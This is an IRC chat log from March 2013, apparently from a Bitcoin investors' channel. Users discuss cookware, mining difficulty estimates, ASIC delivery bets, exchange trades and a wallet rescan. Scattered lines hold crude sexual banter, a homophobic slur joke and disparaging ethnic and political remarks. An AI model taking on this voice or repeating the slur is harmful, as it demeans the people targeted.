01 19:32:04 bronze i thinl Mar 01 19:32:07 i think i have a few of them Mar 01 19:32:17 woks are often cast iron or annonized steel Mar 01 19:32:17 bronze good or bad? Mar 01 19:32:22 lol inb4 new wok selling bitcoin business Mar 01 19:32:27 bronze is fine, although you usually don't see it anymore Mar 01 19:32:37 Diablo-D3 i think he's in asia neh ? Mar 01 19:32:41 stainless steel is the best for the surface though Mar 01 19:32:58 im pretty sure they are mostly steel that we have Mar 01 19:33:00 you can get pans that are pure 18/10 stainless, and they're good Mar 01 19:33:10 copper bottoms are better Mar 01 19:33:21 fuck, im going to go check.. iv not been in the kitchen for months and im going in to see pots... Mar 01 19:33:23 almost pure copper is 1%er kind of shit Mar 01 19:33:37 there are pro chefs that don't use shit like this Mar 01 19:34:58 Im like this Mar 01 19:35:01 Im too poor to buy cheap shit Mar 01 19:35:06 nanotube knows what Im talking about Mar 01 19:35:50 i think the stuff we ahve is mostly steel Mar 01 19:36:08 Chaang-Noi: 18/10 steel is what a lot of people have Mar 01 19:36:25 why is steel bad again? Mar 01 19:36:31 like, commercial grade shit is usually pure 18/10 or aluminum/18/10 bonded Mar 01 19:36:34 Chaang-Noi: its not Mar 01 19:36:38 okay Mar 01 19:36:40 the best cooking surface you can get is 18/10 stainless Mar 01 19:36:48 its not the best _conductor_ though Mar 01 19:36:57 i see Mar 01 19:37:05 thats why a lot of high grade 18/10 stainless pans have a copper layer inside Mar 01 19:37:31 the only thing better is as much copper as possible with a thin layer of 18/10 as the cooking surface Mar 01 19:37:32 i dont think im picky enough id notice the differance Mar 01 19:37:40 how often do you cook? Mar 01 19:37:44 cook? Mar 01 19:37:49 unless you cook every single day and do hardcore shit, you'd never see it Mar 01 19:37:51 omfg what is with the difficulty ?! Mar 01 19:38:04 am i seeing this right, we're getting a downtrend retarget ?! Mar 01 19:38:05 if i cant go out of have some one cook for me i will eat bread from the bag and beer... Mar 01 19:38:15 mircea_popescu: gpis are being powered down Mar 01 19:38:21 mircea_popescu: its the calm before the storm Mar 01 19:38:28 of = or Mar 01 19:38:29 omfg this is insanity Mar 01 19:38:43 Chaang-Noi: yeah see, Im rejecting most pre made foods Mar 01 19:38:50 I guess a lot of the 25 terahash of GPUs are being removed Mar 01 19:38:50 so do i Mar 01 19:38:51 Im doing it Real Man (™) style Mar 01 19:39:02 holy shit Mar 01 19:39:08 we grow much of what we eat Mar 01 19:39:08 osx can automatically spellcheck that Mar 01 19:39:30 and get local the rest, in the market Mar 01 19:39:34 but i neer cook it Mar 01 19:39:37 never Mar 01 19:39:59 huh, why not? Mar 01 19:40:00 why not ? Mar 01 19:40:28 i dont know, i never have. also spending more than 10 mins trying to get a meal is a waste of time Mar 01 19:40:38 my wife will spend 2 hours on a meal some times... fucking insane Mar 01 19:41:06 its an artform Mar 01 19:41:22 i hear you say that im thinking "this is like saying spending more than 2 minutes to get laid is a waste of time" Mar 01 19:41:39 who spends more than 2 hours to get laid? Mar 01 19:41:50 you know i live in thailand right? Mar 01 19:41:56 i don't think i spent two hours actually cooking yet tho Mar 01 19:42:11 i don't mean the part between meeting the girl and getting her naked. Mar 01 19:42:19 i mean the part between her being naked and you being done Mar 01 19:42:20 oh, i do BBQ, but i dont really count that as cooking Mar 01 19:42:24 mircea_popescu: 2 minutes getting laid? wtf, must be an asian thing Mar 01 19:42:35 more like rabbit thing Mar 01 19:42:47 he prolly does it 49 times on an avg day Mar 01 19:42:49 I couldn't get off in 2 minutes if I tried. Infact, I did. Didn't happen. Mar 01 19:43:03 ;;estimate Mar 01 19:43:04 Next difficulty estimate | 17471712.2288 based on data since last change | 4610091.30003 based on data for last three days Mar 01 19:43:16 ??? Mar 01 19:43:16 what the fucking fuck Mar 01 19:43:18 are we forked ?! Mar 01 19:43:24 we're forked. there's just no way. Mar 01 19:43:30 ahh sex time, yeah i have done over 2 hours before but not for a while.... 30 mins to an hour is fine... Mar 01 19:43:39 Chaang-Noi most cooking takes about the same. Mar 01 19:43:56 yest i made shrimp in white sauce with garlic + pasta, took like 25. Mar 01 19:43:58 yeah, but sex is so much better than food Mar 01 19:44:03 hm Mar 01 19:44:21 if im goig to spend 1 hour doing something its going to be sex, not cooking:) Mar 01 19:44:27 well obviously different, but both sensual delights. Mar 01 19:44:28 hell, I wouldn't mind doing 8 hours on a meal Mar 01 19:44:33 depends entirely what you're doing Mar 01 19:44:56 but really, whats going on with the diff Mar 01 19:45:07 ;;bc,stats Mar 01 19:45:10 Current Blocks: 223776 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 2015 blocks | Next Difficulty In About: 1 week, 5 days, 16 hours, 9 minutes, and 3 seconds | Next Difficulty Estimate: 17471712.2288 | Estimated Percent Change: 300.00477 Mar 01 19:45:26 uh Mar 01 19:45:36 I'm getting June futures Mar 01 19:45:39 wait Mar 01 19:45:44 LOL Mar 01 19:45:49 17 mn ?! Mar 01 19:45:58 holy sheit i read that as 1.7mn Mar 01 19:46:09 yeah asics on fire Mar 01 19:46:11 not sure we're forked... but looks like someone could do a 50% + Mar 01 19:46:20 look at http://bitcoincharts.com/charts/ tho Mar 01 19:46:23 they have very diff numbers. Mar 01 19:46:25 that would suck, lol Mar 01 19:46:30 unless BFL is testing on top of ASICMINER Mar 01 19:46:40 bot isn't in sync... Mar 01 19:46:54 yeah, they're showing 3m estimated Mar 01 19:47:08 much different than the numbers gribble is giving Mar 01 19:47:18 i wonder wtf. Mar 01 19:47:19 where does gibble pull from Mar 01 19:47:24 r' Mar 01 19:47:44 even the diff change is saying 914 blocks, and gribble is saying 2015 blocks Mar 01 19:47:56 err s/914/974 Mar 01 19:48:00 gribble wins tho, it's about 2k Mar 01 19:48:06 retarget was earlier today Mar 01 19:48:07 yeah, werid Mar 01 19:48:20 maybe charts is off Mar 01 19:48:43 ;;bc,nethash Mar 01 19:48:44 33000.822494620807 Mar 01 19:48:51 http://bitcoindifficulty.com/ Mar 01 19:48:55 http://bitcoin.sipa.be/ Mar 01 19:49:58 it's clearly up Mar 01 19:50:03 charts is fucked up, must be Mar 01 19:50:31 is the estimate off? Mar 01 19:50:45 or is the estimate highest the farther away the next retarget it Mar 01 19:50:53 I think it's going to go down very quickly Mar 01 19:50:56 ;;estimate Mar 01 19:50:57 Next difficulty estimate | 17471712.2288 based on data since last change | 4610091.30003 based on data for last three days Mar 01 19:51:09 ah Mar 01 19:51:13 wait three days i guess Mar 01 19:51:16 stringpuller wins Mar 01 19:51:36 good charts Chaang-Noi Mar 01 19:51:41 thanks Mar 01 19:51:46 that is what i use Mar 01 19:51:50 not mine btw Mar 01 19:52:16 sipa is wuile Mar 01 19:52:50 wuile? wut dat meen? Mar 01 19:54:12 Pieter Wuille aka sipa, https://github.com/sipa Mar 01 20:04:35 ;;bc,stats Mar 01 20:04:37 Current Blocks: 223778 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 2013 blocks | Next Difficulty In About: 1 week, 5 days, 12 hours, 4 minutes, and 28 seconds | Next Difficulty Estimate: 12559483.346 | Estimated Percent Change: 187.54212 Mar 01 20:04:47 12M now Mar 01 20:14:15 who runs bitbet.us? Mar 01 20:14:25 mircea_popescu does Mar 01 20:14:43 lol Mar 01 20:14:50 cool, you made me .7btc mr. mircea_popescu Mar 01 20:14:52 watch me get a cake for doing such a good job Mar 01 20:14:54 ahahaha win Mar 01 20:14:58 FUUUU Mar 01 20:15:02 lmao totally. Mar 01 20:15:30 oh, bitbet report is in? Mar 01 20:15:34 soonish Mar 01 20:15:41 just as soon as im done cooking the motherfucking books Mar 01 20:15:49 who knew accounting is this hard ;/ Mar 01 20:16:47 It's more of being a PITA than being hard. Mar 01 20:16:59 yes exactly. Mar 01 20:17:11 "This is not the apocalypse. It's just dumb," Mr. Obama told reporters Mar 01 20:17:17 re: sequester Mar 01 20:17:44 mircea_popescu: What is the basis for your difficulty prediction? Mar 01 20:17:54 whioch one ? Mar 01 20:18:00 [BTCTC] [BTC-MINING] 8 @ 0.03401 = 0.2721 BTC [-] Mar 01 20:18:34 "Bitcoin next difficulty looks like 17mn, a 300%ish increase. Possibly largest gap since the very early days." Mar 01 20:19:26 ;;estimate Mar 01 20:19:33 Next difficulty estimate | 5830327.65884 based on data since last change | 4610091.30003 based on data for last three days Mar 01 20:20:14 it was the early estimate. Mar 01 20:20:36 that was like 15 minutes ago though Mar 01 20:21:16 [MPEX] [S.MPOE] 5000 @ 0.00074307 = 3.7154 BTC [-] Mar 01 20:21:17 [MPEX] [S.MPOE] 6550 @ 0.00074306 = 4.867 BTC [-] Mar 01 20:21:19 [MPEX] [S.MPOE] 1250 @ 0.00074306 = 0.9288 BTC [-] Mar 01 20:22:08 it will change in 15 more minutes too Mar 01 20:25:57 yes, early on estimates are noisy Mar 01 20:26:54 i just got an email from my bank...they'd like me to donate some food to them. Mar 01 20:27:07 o_O Mar 01 20:27:28 "people guarding the safes are hungry, f1" Mar 01 20:28:47 mkay, first version of cooked books. http://trilema.com/2013/bitbet-february-2013-statement/ Mar 01 20:28:53 now let's see if we can get this shit past the auditors Mar 01 20:28:56 kakobrekla what say you ? Mar 01 20:29:42 lemme see here Mar 01 20:33:08 There's really not much to cook Mar 01 20:33:37 imsaguy i gave up the weird cash-basis monstrosity i was doing last month Mar 01 20:33:47 because if i kept up with it the report would have been literally uninteligible Mar 01 20:33:50 just hire smickles already Mar 01 20:33:52 much lighter version now Mar 01 20:33:55 he's pregnant Mar 01 20:34:08 jesus? Mar 01 20:34:17 jesus had the flu Mar 01 20:34:35 oh, I thought jesus was coming again Mar 01 20:37:19 [BTCTC] [BASIC-MINING] 2 @ 0.35 = 0.7 BTC [+] Mar 01 20:38:17 that's why smickles is pregnant Mar 01 20:44:12 http://img.chan4chan.com/img/2009-01-27/1233029874506.jpg Mar 01 20:46:46 ;;seen smickles Mar 01 20:46:46 smickles was last seen in #bitcoin-assets 2 weeks, 6 days, 16 hours, 36 minutes, and 3 seconds ago: pong Mar 01 20:46:52 smickles is super afk Mar 01 20:47:03 ^ imsaguy Mar 01 20:48:51 i bet smickles killed someone Mar 01 20:48:56 and he's just laying low Mar 01 20:49:26 he's 182% gangster to the core, that smickles Mar 01 20:51:45 https://forums.butterflylabs.com/bfl-forum-miscellaneous/678-march-magic-month.html#post10143 Mar 01 20:51:49 this is kinda funnay. Mar 01 20:52:12 the person that i'm pretending to be pretending to be or somesuch found it for me. imagine, a girl actually read bfl forums! Mar 01 20:54:14 <[\\\]> heh Mar 01 20:54:36 bitbet referrals need whole addy or firstbits are okay? Mar 01 20:54:38 <[\\\]> I'm gonna make a bunch of claims, but then turn around and make a disclaimer that the claims could be false Mar 01 20:55:03 whole addy Mar 01 20:55:15 <[\\\]> He's too busy to do his own research but not too busy to make the initial claim Mar 01 20:55:30 moreover... he disclaims whether bitbet is in fact owned by me or not Mar 01 20:55:35 but he knows for a fact i'm a sad panda Mar 01 20:55:49 because you see, there's some girl that keeps beating up on him on the interwebs Mar 01 20:55:52 totally legit. Mar 01 20:56:51 <[\\\]> "one more day, I promise" Mar 01 20:56:57 <[\\\]> cross my heart, hope to die. Mar 01 20:57:03 <[\\\]> ok fine, I hope you die. Mar 01 20:57:09 ;;google one more day Mar 01 20:57:10 Spider-Man: One More Day - Wikipedia, the free encyclopedia: ; One More Day by Diamond Rio - The Last Time - YouTube: ; One More Day Lyrics - Diamond Rio: Mar 01 20:57:22 wss this cheezy 90s song Mar 01 20:57:31 [BTCTC] [GSDPT] 15 @ 0.00611 = 0.0917 BTC [-] Mar 01 20:57:33 [BTCTC] [GSDPT] 1 @ 0.0061 BTC [-] Mar 01 20:57:33 <[\\\]> I'll take your word for it, panda. Mar 01 20:57:35 [BTCTC] [GSDPT] 100 @ 0.00609 = 0.609 BTC [-] Mar 01 20:57:52 <[\\\]> oh wait, inaba said you're a liar Mar 01 20:57:57 <[\\\]> and mommy said I can't talk to liars. Mar 01 20:58:08 [HAVELOCK] [HIM] 6 @ 1.7 = 10.2 BTC [-] Mar 01 20:58:20 ya except after mpoe-pr walked all over his face on btctalk he has to say it in blfcloset Mar 01 20:59:59 <[\\\]> its easier to make up the rules in your own sandbox Mar 01 21:01:00 "This person seams pretty sure of him self to bet so much money that we wont be seeing Mar 01 21:01:00 A shipment before march, this has me a little worried." Mar 01 21:01:03 very cute tho. Mar 01 21:01:39 <[\\\]> are there april bets yet? Mar 01 21:02:18 yeah there's one like 60 btc Mar 01 21:02:28 <[\\\]> how about may or june? Mar 01 21:02:33 not yet those. Mar 01 21:02:36 http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ Mar 01 21:02:38 avalon too Mar 01 21:02:48 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ Mar 01 21:02:50 <[\\\]> I wouldn't take the avalon Mar 01 21:03:14 10:13 and 24:33 respectvely Mar 01 21:03:36 apparently ppl think avalon has more of a shot ?! Mar 01 21:03:51 in any case this makes me realise, bet arbitraging is now possible. yes one no the other or we Mar 01 21:03:52 <[\\\]> avalon has at least proven a device Mar 01 21:03:57 <[\\\]> even if not shipping en masse Mar 01 21:03:58 that is a point. Mar 01 21:04:13 <[\\\]> what did kanoi hack on? Mar 01 21:04:35 <[\\\]> they shipped him to bfl to develop software, but what did he test with? Mar 01 21:04:37 the avalon is not the quality i would expect Mar 01 21:04:38 wasn't he on asicminers ? Mar 01 21:04:45 but i would certainly rock the hashes Mar 01 21:05:09 damint fonzi, pick a nick Mar 01 21:05:11 <[\\\]> FonziSource: I'd expect there to be revisions between what Jeff got and what everyone else will receive Mar 01 21:05:21 for avalon? yeah Mar 01 21:05:25 prolly. Mar 01 21:05:28 maybe a more poished product Mar 01 21:05:43 I've read about the bugs and such Mar 01 21:06:02 my guess would be thatm ost actual units would struggle to reach the prototype performance Mar 01 21:06:08 it's the chinese way after all. soviet import. Mar 01 21:06:14 but if the only bug is that it hangs every so x Mar 01 21:06:24 <[\\\]> that's not a bug Mar 01 21:06:24 i'd reboot it prior to x and have a coke and a smile too Mar 01 21:06:25 <[\\\]> thats a feature Mar 01 21:06:44 <[\\\]> the windows miners still like to freak out after 5 days Mar 01 21:06:47 <[\\\]> so its not much different Mar 01 21:06:52 <[\\\]> schedule the reboot and be done Mar 01 21:06:54 mine is rock-steady mostly yo Mar 01 21:07:02 i just have the one Mar 01 21:07:06 <[\\\]> it is a bug in cgminer Mar 01 21:07:10 <[\\\]> don't tell them that tho Mar 01 21:07:12 <[\\\]> they'll blame windows Mar 01 21:07:17 but I've got a cgminer running now since november on linux Mar 01 21:07:19 non-stop Mar 01 21:07:27 <[\\\]> but basically, there were a few versions of cgminer that run for weeks Mar 01 21:07:31 <[\\\]> the new versions don't anymore Mar 01 21:07:35 lmao Mar 01 21:07:37 upgrade! Mar 01 21:07:40 <[\\\]> there's a leak somewhere :D Mar 01 21:08:07 <[\\\]> mircea_popescu: the whole stratum thing is forcing upgrades Mar 01 21:08:19 i guess so Mar 01 21:08:26 from what i gather the stratum is kinda unavoidable tho Mar 01 21:08:28 cgminer version 2.4.0 - Started: [November 29, 2012, 12:47 pm] Rig: leviathan Mar 01 21:08:28 (avg): 1040.85 Mh/s | Q:1714540 A:1896580 R:19689 HW:0 U:14.31/m ST:2258 DW:414493 NB:15431 LW:4265417 GF:292 RF:658 Mar 01 21:08:33 killing it Mar 01 21:09:02 no you can avoid if if you use Luke-Jr's bfgnet Mar 01 21:09:09 what's it called Luke-Jr Mar 01 21:09:14 GBT Mar 01 21:09:17 iirc Mar 01 21:09:24 or is that a street drug Mar 01 21:09:52 big fag net ? Mar 01 21:10:07 great big tatas Mar 01 21:10:42 http://bitbet.us/bet/41/network-difficulty-under-3-75-million/ Mar 01 21:10:47 oddly enough this is almost even money. Mar 01 21:10:52 pigeons: I don't maintain BFGMiner old versions very long either Mar 01 21:10:54 ;;bc,diff Mar 01 21:10:55 4367876.0008422 Mar 01 21:10:58 ;;bc,stats Mar 01 21:11:01 Current Blocks: 223785 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 2006 blocks | Next Difficulty In About: 1 week, 5 days, 18 hours, 38 minutes, and 58 seconds | Next Difficulty Estimate: 5112621.65753 | Estimated Percent Change: 17.05052 Mar 01 21:11:07 thought [\\\] should know better, and use it since it's got less bugs :P Mar 01 21:11:09 20 percent yesterday Mar 01 21:11:25 so how much did the diff increase Mar 01 21:11:28 doesnt eligius support another overlay protocol in addition to stratum as an alternative? Mar 01 21:11:31 the last estimate i saw was 20% Mar 01 21:11:40 pigeons: Eligius supports standard GBT of course Mar 01 21:11:47 that's what i was looking for Mar 01 21:11:58 the name of gbt as an alternative to stratum Mar 01 21:12:07 gay bisexual lesbian, Mar 01 21:12:15 err transgender Mar 01 21:12:19 gay bisexual thespian Mar 01 21:12:28 oh my~ Mar 01 21:12:34 gbt miner Mar 01 21:12:39 bitpride.com Mar 01 21:12:45 gluttonous belching thracian why not Mar 01 21:12:48 definitely bitpride Mar 01 21:14:25 https://en.bitcoin.it/wiki/BIP_0023 Mar 01 21:14:37 ackageShell provides an environment for software packages to run in. Mar 01 21:14:40 from bitpride.com Mar 01 21:15:03 chef don't judge Mar 01 21:15:42 has sdice dividend been announced yet ? Mar 01 21:18:55 wtf is this free money here Mar 01 21:18:55 http://bitbet.us/bet/41/network-difficulty-under-3-75-million/ Mar 01 21:19:06 i mean, was. Mar 01 21:19:11 silly ppl. Mar 01 21:20:07 ah i see im late to the party, was this was already beaten moments ago Mar 01 21:20:15 nevermind me Mar 01 21:20:51 gbt is really an unfortunate name. Mar 01 21:21:48 Hey wasn't there a bet that Josh (from BFL) did about BFL delivery times not that long ago? Mar 01 21:22:23 [MPEX] [S.MPOE] 5000 @ 0.0007499 = 3.7495 BTC [+] Mar 01 21:22:25 [MPEX] [S.MPOE] 5262 @ 0.00074991 = 3.946 BTC [+] Mar 01 21:22:25 [MPEX] [S.MPOE] 5000 @ 0.00075999 = 3.8 BTC [+] Mar 01 21:22:27 [MPEX] [S.MPOE] 21238 @ 0.00076 = 16.1409 BTC [+] Mar 01 21:23:35 [BTCTC] [GSDPT] 100 @ 0.006 = 0.6 BTC [-] Mar 01 21:24:24 [MPEX] [S.DICE] 100 @ 0.00610824 = 0.6108 BTC [-] Mar 01 21:24:26 [MPEX] [S.DICE] 900 @ 0.00610823 = 5.4974 BTC [-] Mar 01 21:26:08 kakobrekla especially as bet was made after the new diff lol Mar 01 21:26:08 [BTCTC] [GSDPT] 138 @ 0.006 = 0.828 BTC [-] Mar 01 21:27:52 :) Mar 01 21:28:30 midnightmagic if you mean the bitbet thing it closed recently. Mar 01 21:28:54 topace not yet Mar 01 21:29:15 mircea_popescu: It was pretty big wasn't it? Mar 01 21:29:20 1.6k Mar 01 21:29:21 13.33k Mar 01 21:29:29 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Mar 01 21:30:07 jesus, 1.7k. Mar 01 21:30:47 mircea_popescu: doh i was hoping it would come today so i coud not work this weekend :p Mar 01 21:30:52 mircea_popescu: Oh, does the site not escrow bets? Mar 01 21:31:18 topace possibly might Mar 01 21:31:30 midnightmagic the site itself is the escrow. Mar 01 21:31:59 kakobrekla, that 3-75-million bet wasn't very visible. i remember myself thinking about it, but then it scrolled down into oblivion Mar 01 21:33:04 myeah Mar 01 21:33:08 bbl gotta go Mar 01 21:34:08 [HAVELOCK] [KCIM] 1 @ 1 BTC [+] Mar 01 21:34:09 i guess after this march 1st bfl will stand for butteryfly lols Mar 01 21:36:41 [BTCTC] [S.DICE-PT] 1 @ 0.00601 BTC [-] Mar 01 21:39:07 [HAVELOCK] [KCIM] 1 @ 0.99 BTC [-] Mar 01 21:39:21 mircea_popescu: What the hell is that last comment bitching at you then..?! When one bets, they actually send BTC to the site right? Who mediates ambiguous bets? Mar 01 21:39:43 tghe site. which last comment ? Mar 01 21:40:07 [HAVELOCK] [KCIM] 2 @ 0.99 = 1.98 BTC [-] Mar 01 21:40:31 mircea_popescu: Scroll way down to the "I am done using this site." Mar 01 21:40:39 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Mar 01 21:40:44 o o. yeah, i dunno. person got bored or w/e Mar 01 21:41:02 if you grep the log there was some wtfing about it earlier Mar 01 21:41:22 "The Electronic Privacy Information Center (EPIC) has filed Freedom of Information Act lawsuit against the Department of Homeland Security, in response to a failure by the agency to release any documents pertaining to the “Emergency Wireless Protocols,” (Standard Operating Procedure 303 or “SOP 303″)." Mar 01 21:41:39 the lol is strong with this one. this sop 303 thing is supposedly the procedure of how to turn off internets. Mar 01 21:41:48 im sure it exists. especially if called "standard". Mar 01 21:42:18 [BTCTC] [GSDPT] 5 @ 0.006 = 0.03 BTC [-] Mar 01 21:42:31 Doesn't SOP usually imply something that's done all the time? Mar 01 21:42:43 in real world or in obamaworld ? Mar 01 21:42:53 Uh. Mar 01 21:43:05 Real world I guess! Mar 01 21:43:07 then yes. Mar 01 21:43:10 [BTCTC] [GSDPT] 1 @ 0.006 BTC [-] Mar 01 21:43:34 in obamaworld things that were never done and can't in principle be done apparently qualify. Mar 01 21:43:45 Lame. Mar 01 21:44:03 don't worry, he's creating jobs too Mar 01 21:44:08 that's prolly sop 69 Mar 01 21:44:16 gobble gobble Mar 01 21:44:29 Holy fuck I make good coffee.. Mar 01 21:45:32 There will be legal action resulting in injuction against or outright ban of sale of Google Glasses (or equivalent Google product) country-wide or state-wide in any country or US state, effective before 1st January 2014. Cited reason may be privacy concerns, patent violation or anything other. Mar 01 21:45:38 mircea_popescu: Seriously man. I make fucking awesome coffee. Mar 01 21:45:40 is such bet preliminary acceptable? Mar 01 21:46:13 kakobrekla ^^^ Mar 01 21:47:13 jurov: Hey. Mar 01 21:47:45 jurov: Guess what. Mar 01 21:48:32 what? they're already banned somewhere? Mar 01 21:48:46 jurov: No. I make awesome coffee. Mar 01 21:50:21 midnightmagic enjoy. i'll keep gulping here this instant shit with stevia. Mar 01 21:50:54 midnightmagic wd. Mar 01 21:51:10 jurov i think so Mar 01 21:52:53 well it's too broad scope... maybe they'll get banned in baluchistan and we won't know it Mar 01 21:54:02 you said us state neh ? Mar 01 21:54:35 [BTCTC] [BTC-BOND] 299 @ 0.01 = 2.99 BTC [+] Mar 01 21:54:38 i said us state or anywhere else Mar 01 21:54:54 maybe limit it to US state or EU country Mar 01 21:56:38 o yeah Mar 01 21:57:37 submitted. we'll see. Mar 01 21:58:09 [HAVELOCK] [HIM] 2 @ 1.7 = 3.4 BTC [-] Mar 01 22:03:55 ;;ticker Mar 01 22:03:56 BTCUSD ticker | Best bid: 34.48000, Best ask: 34.50999, Bid-ask spread: 0.02999, Last trade: 34.48001, 24 hour volume: 61642.33337937, 24 hour low: 30.90200, 24 hour high: 34.90000, 24 hour vwap: 33.38684 Mar 01 22:04:09 34.9 ftw Mar 01 22:15:08 [HAVELOCK] [SDICE] 1 @ 0.6835 BTC [-] **** BEGIN LOGGING AT Fri Mar 1 22:22:03 2013 Mar 01 22:22:25 we're breaking 35 arent we Mar 01 22:26:02 http://i.imgur.com/81Jun1Q.jpg Mar 01 22:26:03 sfw Mar 01 22:26:49 only have one weapon = moustache ? Mar 01 22:28:45 http://en.wikipedia.org/wiki/Black_rage_(law) also, lol. Mar 01 22:29:18 written, produced, and directed by Chris Robinson Mar 01 22:29:24 I wonder is Chris is angry Mar 01 22:29:39 ;;google chris robinson black rage Mar 01 22:29:39 Black Rage (film) - Wikipedia, the free encyclopedia: ; Amazon.com: Black Rage [VHS]: Chris Robinson, Ted Cassidy ...: ; Charcoal Black (1972) - IMDb: Mar 01 22:30:10 Two slave brothers, one black, one an albino, discover a treasure map which is taken from them by their foreman. They take it back but are pursued by the foreman. Originally, the foreman seeks the aid of two bounty hunters who pursue the protagonists throughout the film. At the end, both the foreman and the bounty hunters catch up with the two escaped slaves, and the foreman has a change of heart, helping to kill the bounty hunters. Mar 01 22:33:25 !ticker m S.MPOE Mar 01 22:33:27 [MPEX:S.MPOE] 1D: 0.0007147 / 0.00075292 / 0.00076 (264833 shares, 199.40 BTC), 7D: 0.00061614 / 0.00069845 / 0.00078 (17743462 shares, 12,393.01 BTC), 30D: 0.0006153 / 0.00067298 / 0.00078 (67591125 shares, 45,487.52 BTC) Mar 01 22:34:08 mpex has almost his 0.0008 BTC Mar 01 22:34:24 SudsyForce course irl it works more like http://en.wikipedia.org/wiki/Colin_Ferguson_(convict) Mar 01 22:34:30 [BTCTC] [GSDPT] 2241 @ 0.006 = 13.446 BTC [-] Mar 01 22:57:23 [MPEX] [S.MPOE] 4710 @ 0.00075142 = 3.5392 BTC [-] Mar 01 22:58:49 https://blockchain.info/hub-nodes Mar 01 22:58:56 the us gets a honorable 4th position. Mar 01 23:11:57 MR mircea_popescu: Is there a way to see the exact trade volumes of the mpex stocks? The graphs on mpex.com are nice but I would like to have more infos, Sir. Mar 01 23:13:32 http://bitcoin-assets.com/mpex-socket/ Mar 01 23:19:06 fydel well, there's the stuff in http://mpex.co/faq.html#11 Mar 01 23:19:21 !ticker m s.mpoe Mar 01 23:19:23 [MPEX:S.MPOE] 1D: 0.0007147 / 0.0007529 / 0.00076 (269543 shares, 202.94 BTC), 7D: 0.00061614 / 0.00069867 / 0.00078 (17683122 shares, 12,354.72 BTC), 30D: 0.0006153 / 0.00067298 / 0.00078 (67573650 shares, 45,476.39 BTC) Mar 01 23:19:29 the 30 day volume comes from the json there for instance Mar 01 23:19:44 mircea_popescu: thank you, sir Mar 01 23:19:52 yw Mar 01 23:26:18 kakobrekla: thank you,,this looks nice Mar 01 23:45:51 ;;seen smickles Mar 01 23:45:52 smickles was last seen in #bitcoin-assets 2 weeks, 6 days, 19 hours, 35 minutes, and 11 seconds ago: pong Mar 01 23:55:47 [BTCTC] [BASIC-MINING] 45 @ 0.35 = 15.75 BTC [+] Mar 01 23:56:45 brb Mar 02 00:00:41 [MPEX] [TEST] [PAID] 1.23456789 BTC to 1`000`000 shares, 0.00000123BTC per share Mar 02 00:01:08 aw fuck it went here Mar 02 00:01:13 a well fuck it then Mar 02 00:01:38 [BTCTC] [COGNITIVE] 15 @ 0.2999 = 4.4985 BTC [-] Mar 02 00:02:51 lol Mar 02 00:04:27 ;;estimate Mar 02 00:04:28 Next difficulty estimate | 4920122.48034 based on data since last change | 4642001.13651 based on data for last three days Mar 02 00:04:37 there wr go more accurate data Mar 02 00:05:41 [BTCTC] [COGNITIVE] 38 @ 0.2999 = 11.3962 BTC [-] Mar 02 00:10:37 [MPEX] [S.BBET] [PAID] 2.72083959 BTC to 5`000`000 shares, 0.00000054 BTC per share Mar 02 00:11:37 that seems to work. Mar 02 00:11:49 tho it'd prolly be a good idea if per share div was quoted in satoshi Mar 02 00:13:00 ok sure Mar 02 00:13:52 done Mar 02 00:14:04 http://3.bp.blogspot.com/_WZOAlyVJY98/TSZt835TmwI/AAAAAAAARwU/CX-qqFCUmJ0/s1600/IMG_1178.JPG Mar 02 00:14:08 isn't she grinning suspiciously. Mar 02 00:24:27 in other news I'm having difficulty reconciling this: http://www.bobatkins.com/photography/technical/optical_illusion.html Mar 02 00:24:34 i may have to take an internet break Mar 02 00:30:06 [HAVELOCK] [HIM] 1 @ 1.6 BTC [-] Mar 02 00:32:03 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Mar 02 00:41:06 [HAVELOCK] [SDICE] 6 @ 0.6805 = 4.083 BTC [-] Mar 02 00:44:56 whats up :) Mar 02 00:45:55 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Mar 02 00:49:26 mpex website is down? Mar 02 00:49:43 or is it me? Mar 02 00:50:22 works here Mar 02 00:58:21 hey dudes, got a little troubleshooting question Mar 02 00:58:26 anyone game? Mar 02 00:59:02 game what? Mar 02 00:59:12 importing a cold wallet.dat into my main bitcoin-qt client Mar 02 00:59:19 and no balance shows up Mar 02 00:59:29 despite it showing the right addresss Mar 02 00:59:42 and being fully synced with network Mar 02 00:59:44 did you try that rescan option Mar 02 00:59:53 and blockchain shows it in there Mar 02 00:59:53 no Mar 02 00:59:57 did not rescan Mar 02 01:00:05 Will that redownload the blockchain? Mar 02 01:00:12 no Mar 02 01:00:23 -rescan Rescan the block chain for missing wallet transactions Mar 02 01:00:39 could it potentially damage my hot wallet? Mar 02 01:00:49 I really should beat Ukto with a cluebat Mar 02 01:01:09 well bitcoin can potentially do preetymuch anything including with stabbing you in the face Mar 02 01:01:11 make a copy Mar 02 01:01:35 bitcoind* Mar 02 01:01:42 yes I have a copy Mar 02 01:01:48 multiple copies Mar 02 01:01:49 well not to worry then Mar 02 01:01:54 OK. Mar 02 01:01:56 close it, run it with -rescan Mar 02 01:02:01 it will take a while Mar 02 01:02:02 ;;ticker Mar 02 01:02:02 BTCUSD ticker | Best bid: 34.82300, Best ask: 34.84999, Bid-ask spread: 0.02699, Last trade: 34.82300, 24 hour volume: 37832.17788346, 24 hour low: 32.92000, 24 hour high: 34.90000, 24 hour vwap: 34.18692 Mar 02 01:02:12 lol Mar 02 01:02:14 I am trying to move my main stash into cold storage, just testing how it works now Mar 02 01:02:18 thanks for the input Mar 02 01:02:28 k Mar 02 01:02:37 bug, had you been so stubborn you woulda been crushed by your puts Mar 02 01:03:01 yes I know Mar 02 01:03:06 that is why I exited them Mar 02 01:03:14 at the bottom of the 24hr dip Mar 02 01:03:24 this market is too damn strong Mar 02 01:03:27 trend is your friend Mar 02 01:03:43 not that I'm complaining Mar 02 01:08:41 eh Mar 02 01:09:09 I'm looking at private islands for a near future purchase.. i wonder which one's the best value for buck Mar 02 01:09:17 :) Mar 02 01:11:04 Diablo-D3 ? Mar 02 01:11:05 what now ? Mar 02 01:11:11 excellent. Thanks kakobrekla Mar 02 